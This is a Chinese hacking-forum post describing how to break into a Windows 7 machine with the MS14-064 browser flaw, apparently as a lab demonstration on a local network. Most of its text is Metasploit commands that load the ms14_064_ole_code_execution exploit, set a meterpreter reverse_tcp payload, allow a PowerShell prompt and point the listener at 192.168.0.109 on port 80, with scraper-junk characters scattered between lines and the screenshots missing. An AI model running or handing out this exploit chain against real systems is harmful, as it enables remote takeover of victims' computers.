找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2017|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

& c- }8 N* }, e7 b8 ^3 k 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示8 A8 r; l4 B6 O

- c* Z' B+ J. j! g/ i+ \

( i' \; f& o. z9 Y 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , n$ \$ Z# ~6 g/ A0 v5 _

4 g$ V) j! J A

2 L9 e; S% R2 V 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp( j7 E1 B0 \2 d$ x

* w% C6 S f2 D6 w6 v/ N

- _: I' |8 T f2 Z4 E8 a' n             set AllowPowershellPrompt true: B( w$ N+ n/ \5 @7 t

) x( {% F4 Q K/ x( Z

; H. T4 M0 K7 B* L- ^& p             Set LHOST 192.168.0.109* K( ?, w* u) g3 y* v- [

8 Y9 n7 W5 b. b# |+ B/ u9 c

7 Q. S2 Z2 N4 |1 m             set SRVHOST 192.168.0.109 : E- ]* M! T- J, e9 o8 Z- v% ^

1 d* r. s* V& A6 G8 p+ V/ V' K P h

( D" ?/ S0 [% d2 c% ~             Set uripath share& `; x" {9 `* ^

- P; z# S8 j8 D

* X" x z, h* V% ?. i             Set srvport 80) E p( s8 O& ~1 g; R, ~4 M5 V! z

; [; d5 Z) n) J% [

f+ i7 N9 G. @# ^   9 H9 ?% N. j) @! Y" f

7 ~) A0 S6 v: K7 e4 w" x9 ^* W4 k4 O

9 @0 r1 {8 F7 K  # k2 z& I' N4 x

% y' G! }1 s: o4 a

, {1 I |) `* e+ ~, i* u& y+ C h: j  0 z; }+ p! S5 J3 q8 X A

1 @0 \! b. b r, }* }- B% C

# r& f4 B) {# u0 u5 ^9 A% o  . f1 s) H/ w# G6 W; t1 V0 D

: h+ j* ^$ ?% j6 |% Y, y. O

?7 d) Z7 r( x) ?, E   , {. @% S s R0 ~/ y

' X# r7 r7 U) w; e6 h6 G

% D: l& R C6 @7 ~ 下面我们来访问本地地址如图:0 N4 I. B& ], N# k

4 V" W% T2 U% L1 i) ]/ A* Y

2 N/ y$ g# i6 Y0 \8 q   x$ |* d* L1 S: J ?

3 j: ?+ U A8 n+ C7 s9 H+ K

$ F" h9 G, G$ W; V4 Q( M, ^ q9 V  8 N# l) E) D' _7 M( ~+ a) n

0 g( N* w+ ~& C/ A

+ A0 J% h5 O7 [& ?( E0 F; E0 j& q & n6 Q1 ?# A. e; F$ `8 ^) A2 t; ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表